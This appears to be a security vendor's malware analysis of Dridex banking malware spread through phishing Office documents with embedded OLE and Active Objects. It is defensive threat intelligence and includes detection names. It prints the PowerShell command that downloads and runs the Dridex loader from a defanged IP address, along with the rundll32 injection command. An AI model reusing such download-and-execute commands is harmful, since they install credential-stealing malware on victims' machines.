Microsoft Office scripting malware has become more and more common and aggressive lately as malware authors constantly develop new techniques to evade detection and deceive users.
This kind of malware, as mentioned in previous posts, usually arrives as an attached document within a phishing email. After the “document” is opened, it downloads the second-stage payload, which downloads and executes the final payload that infects the host machine.
In a recent case involving the Dridex malware, McAfee Labs found the distribution method to be typical: The malware arrives via a phishing email.
We have discovered that the attached document can arrive in one of two variants:
- The first variant comes as an XML document (.XML or .DOC) containing an embedded Office object encrypted in base 64. The object is decrypted and executed when the XML file is opened.
The embedded ActiveMime object contains an encrypted OLE document that is decrypted and executed just after the Office object is opened by the XML file.
The OLE file then executes a malicious embedded macro that contains code similar to what we see in the following image. This code executes PowerShell and downloads the Dridex Loader.
- The second variant comes as a Word or Excel file (.DOC or .XLS) that contains an Office Active Object which executes the malicious code in the OLE file as native OLE code.Thus, even if the user has not enabled the execution of macros, the malware can execute by running the malicious code directly from the OLE file. To deceive the user, the malware presents a document file with an Active Object embedded. As shown in the following image, the user is warned about opening malicious Active Objects, similar to the warning displayed next whenever a user tries to open a document containing an embedded macro:
An incautious user might open the embedded Active Object by ignoring the warning and double-clicking the object. In this case, the downloader code will run by executing a PowerShell instance, as in the previous variant.
In either case, the embedded malicious code will execute a command-line instruction that runs powershell.exe with the following parameters:
- cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile(‘hxxp:// 18.104.22.168 /asalt/assa.exe’,’%TEMP%\JIOiodfhioIH.cab’); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;
The preceding code will run only if powershell.exe is installed on the system. (The malicious URL has been edited for safety.)
After executing this code, the malware downloads and executes the Dridex loader, which downloads and installs the Dridex DLL on the system.
This DLL is injected into explorer.exe by running the following command:
- rundll32.exe “C:\XX.tmp” NotifierInit
After executing this command, Dridex installs itself on the system, rundll.exe is terminated, and the host is infected. The malware then contacts its control server(s) to report the infection.
Dridex is “banker” malware that can steal user credentials for online accounts; it is derived from Cridex. Both are part of the GameOver Zeus malware family.
The following control servers were contacted by the malware during our research. We recommend blocking the following IPs:
McAfee products detect this malware and its payload with the following detection names:
- W97MDownloaders: W97M/Downloader.aen, W97M/Downloader.aev, W97M/Downloader.afc, X97M/Downloader
- Dridex Downloader(Loader): Downloader-FAQM, Downloader-FAQZ
- Dridex 32/64 bits: PWS-Dridex